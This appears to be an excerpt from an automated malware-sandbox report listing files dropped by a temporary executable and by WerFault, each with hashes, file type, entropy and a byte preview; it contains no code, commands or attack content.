                                                                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.697476937124145
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:ZHCq3JbSxIq6BFnj6ku15ZgD3mwworSHynqRkWcVy:ZJJBdjzutVwdrEynqRJcs
                                                                                                                                                                                                                                                                                      MD5:B5DCEDFE74691665C5378C902E1B8783
                                                                                                                                                                                                                                                                                      SHA1:1C015C1000EDCC8DD1D41E7A6164A1441BCAB71F
                                                                                                                                                                                                                                                                                      SHA-256:BFECD17BD22F40F72127A4F28CC8347BEB2F2472D795E5D895FA58D6B95408D8
                                                                                                                                                                                                                                                                                      SHA-512:DEA52E292EC1F0D73BC6ACE2DC5B03E635FC5196670127259950249458C92286C02381757CF5BE56D360143ABF746BFE86C67A457FE9F5FED38ACBBBFBB5C058
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0222455013532195
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:rOFWQCMs0YqR+qq8fHQXIDcQUJc6UhcEIcw3G+HbHg/opAnQr39DDWpsOyP9Qxv4:yhCM7c70c+SbjSJ8JkzuiF3Z24IO8L
                                                                                                                                                                                                                                                                                      MD5:74795F1DD39336C8ECB6D12F6BCDA123
                                                                                                                                                                                                                                                                                      SHA1:90B5F46AFF31530060C512563199347D69D83EA4
                                                                                                                                                                                                                                                                                      SHA-256:1A60CEC518971A58F2AE55989A692295D1AB56BF4C431645E60FAC4DC119E1CF
                                                                                                                                                                                                                                                                                      SHA-512:41A95CEE1FF8929E7401E1902AEAF53AB67271527C1F5EC6622D5978E34A5B859799C1309F46BF4E3FD3DA0C0F27194DE421E13D9800E0BEFA225F57C32F8E26
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.0.9.0.1.5.6.0.2.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.0.9.0.2.3.7.2.7.5.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.9.c.1.7.3.6.-.8.5.f.1.-.4.0.e.3.-.b.1.7.4.-.1.4.5.3.6.7.d.5.e.c.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.3.c.4.f.f.5.-.6.c.8.4.-.4.5.b.3.-.a.2.1.b.-.5.5.5.c.8.f.6.5.1.a.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.B.f.h.C.y.c.V.4.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.1.c.-.0.0.0.1.-.0.0.1.4.-.f.2.d.1.-.2.5.c.2.4.f.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.2.d.5.f.a.7.1.8.3.2.d.b.9.b.8.7.f.e.0.b.0.b.4.a.2.c.5.1.0.f.e.0.0.0.0.0.a.1.6.!.0.0.0.0.0.7.b.9.0.b.6.9.d.3.7.f.c.e.e.d.0.e.0.1.a.9.e.a.b.1.0.9.e.6.2.6.5.2.d.9.c.3.9.d.!.4.B.f.h.C.y.c.V.4.B...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0541327276720027
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:wIhFGMo08l3bjSXZrMZm9bzuiF3Z24IO8R:9hFGMD8l3bj78bzuiF3Y4IO8R
                                                                                                                                                                                                                                                                                      MD5:DC8842CDB2C44CDE6F2FC71AB101AA94
                                                                                                                                                                                                                                                                                      SHA1:C12256C8E451813185B5A88E2E68757BC54D142E
                                                                                                                                                                                                                                                                                      SHA-256:61474D228E10796F4101E36A76DE2A6D0331847B4C5E7948661C6A39239710A0
                                                                                                                                                                                                                                                                                      SHA-512:401AC0967AB56AA775842841EFE0B1FF325E2C92AD0E9029BA9556B3DDFAA8658ACDF5D63344695739BC26E568D8742EE15E613CF58CC858C8EB5DDC74EA3FBE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.0.9.1.1.6.8.4.8.3.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.0.9.1.2.7.9.4.1.9.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.2.c.9.f.f.8.-.0.d.4.e.-.4.0.0.a.-.8.d.3.e.-.5.2.6.5.e.f.d.d.e.c.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.f.0.d.f.a.7.-.1.7.f.4.-.4.5.4.3.-.8.3.b.2.-.1.2.4.7.4.5.5.6.4.5.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.3.z.0...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.9.c.-.0.0.0.1.-.0.0.1.4.-.7.e.c.b.-.9.a.c.4.4.f.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.c.3.e.1.e.b.3.5.8.8.a.f.5.0.f.2.6.c.a.8.e.a.8.2.1.b.0.a.8.4.0.0.0.0.0.0.a.1.6.!.0.0.0.0.b.e.3.9.d.0.7.7.0.4.e.f.b.3.5.b.d.1.5.0.3.b.3.9.1.4.c.6.d.d.6.c.9.e.6.3.1.2.e.8.!.u.3.z.0...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Apr 23 07:28:21 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):45781
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.8880335831658988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:lgqwSc6xFnDO1CH5IH2Ltgz+XR/2LhcN0OvuLznO:qnv6xFnDO1awotg1lWH2PO
                                                                                                                                                                                                                                                                                      MD5:7E03D6E10FB3F78C5CC2380B0A844751
                                                                                                                                                                                                                                                                                      SHA1:8DA9723228B660F52A8F984EA4E7A18B9EA6583D
                                                                                                                                                                                                                                                                                      SHA-256:998969C7E4F14AC76175291A77D74458DE9A831A6A1C59CC7C4A3F2BEAE5F036
                                                                                                                                                                                                                                                                                      SHA-512:43A1C0B4A9963931036648A4C9A0F69C84441756DD9CE4EB28A3E428023FB43F1971F55BD26CAF00B16D977B48F0CE7D1D3ED4AC597E286BDE1D11E5177F2BD2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MDMP..a..... ........c'f............4...............H............!......D...l6..........`.......8...........T...........X5..}}...........#...........%..............................................................................eJ......h&......GenuineIntel............T............b'f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8338
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6968904447513213
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJoU6/N6YEITSU76gmfa/VpDu89bd8sfwfm:R6lXJz6l6YEMSU76gmfa/ndPfV
                                                                                                                                                                                                                                                                                      MD5:98A08FDEE8A8028D0F30AE1C036DF5AE
                                                                                                                                                                                                                                                                                      SHA1:7812E974E6EE128C3AA2907D1350B9675AA9BF66
                                                                                                                                                                                                                                                                                      SHA-256:766A271AEA89033E7E8634CA1A7A7F4B989EB34E2F5480AC89B71F39E6A197B3
                                                                                                                                                                                                                                                                                      SHA-512:0B0368A319F9929966DA8640B8F6BD380F8DA007C742CBAEC2A3BEE72F1A544958CA4988715B5A301119B1FDA9C412AA134F55222002ABD964FC9E12262072B4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.4.8.<./.P.i.
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4583
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.471548521880386
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zszJg77aI9alWpW8VYoYm8M4JRkBmhFd+q8KC6c582uoued:uIjfNI7QU7VoJHo5CFed
                                                                                                                                                                                                                                                                                      MD5:E4F22C61D5F40BDFC706A2639E88E199
                                                                                                                                                                                                                                                                                      SHA1:8980E943CCF66A276EF2D9871AA649A312A15828
                                                                                                                                                                                                                                                                                      SHA-256:D4838CC644CBE586741E7A51E3EC3CAE59B7D6B4DB1BDC484123C519F1B502F8
                                                                                                                                                                                                                                                                                      SHA-512:0DECD008138C29B461734CD581F7D2AE91DF83F5283620DAF6B6EA842690DE1DF1654A0F15209E2CACFFFCC9D478F7DE3EEFF7A18BA963AA773B60D788CCA507
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Tue Apr 23 07:28:31 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):56794
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.6571116089227007
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:dDhuwut0wnEEdFX8uBJSamullUny3DP4l1Q:ywMJnEE/BgaNUy8l1Q
                                                                                                                                                                                                                                                                                      MD5:C345120B2504B60501B6034FEA214DA0
                                                                                                                                                                                                                                                                                      SHA1:D1CC110B653CAEFCB6F53124DA95D3FA8A0BAB99
                                                                                                                                                                                                                                                                                      SHA-256:924E075F726D04A13A1A059583866FC6D9F0234FDC940B375B4996EA7AA656F3
                                                                                                                                                                                                                                                                                      SHA-512:916D6F4BE3CC1FDBE9507D828DE54B0059B1F4E0CFFE32565201DBBC2FA15EE491A3B22B093125D4052D7C7A337619545676FDDE9BAEC50718A69A093A696B8E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):8324
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6947124822695248
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJeZ6926YYKo6PvgmfSBFpD/89b3rsfL9m:R6lXJ46926Y7o6ngmfS23wfc
                                                                                                                                                                                                                                                                                      MD5:F1387E98E1D0A576EB1FC93A9456D6C0
                                                                                                                                                                                                                                                                                      SHA1:C9C5B3E266D388BA4E69A5F9260F12E870E568D7
                                                                                                                                                                                                                                                                                      SHA-256:95E9B897EE8B31B980AC4FB75327A5C163EB9D5600FE96DE9512327E52C7D05C
                                                                                                                                                                                                                                                                                      SHA-512:ACF6E660327474B1BE798C7ACBC13B4151252C1E14D46F89B74DAE7AB5D1D9FD7018C7394320FDDDA4144F3C27BF0D97759D33C72606D19288E919CE6924DD95
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.0.0.<./.P.i.
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4555
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.440171802854924
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zszJg77aI9alWpW8VY9Ym8M4JEm5UFP+q83wTj4ozpId:uIjfNI7QU7VhJOXzpId
                                                                                                                                                                                                                                                                                      MD5:B6DB3B4F6630293AB3C2E0712F02858B
                                                                                                                                                                                                                                                                                      SHA1:EE273179FC07AA806D01C333B45D16D66B05C0B4
                                                                                                                                                                                                                                                                                      SHA-256:1BA74EBE77FF18C5DE9C5380DCE1C496ED9F5767297976E8B70ADF60207FC01D
                                                                                                                                                                                                                                                                                      SHA-512:B549C7FD401C958DB695C54F09AD693F90204941091B7B5D7076ECAE3A86CD83801189752518080F6B97B0C100CE150BFAC93F95225D68429ACCBEBADDDD158A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292231" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                                                                      MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                                                                      SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                                                                      SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                                                                      SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696724055101702
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                                                                                                                                                                                                                      MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                                                                                                                                                                                                                      SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                                                                                                                                                                                                                      SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                                                                                                                                                                                                                      SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696724055101702
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                                                                                                                                                                                                                      MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                                                                                                                                                                                                                      SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                                                                                                                                                                                                                      SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                                                                                                                                                                                                                      SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.694142261581685
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                                                                                                                                                      MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                                                                                                                                                      SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                                                                                                                                                      SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                                                                                                                                                      SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                      Encrypted:false
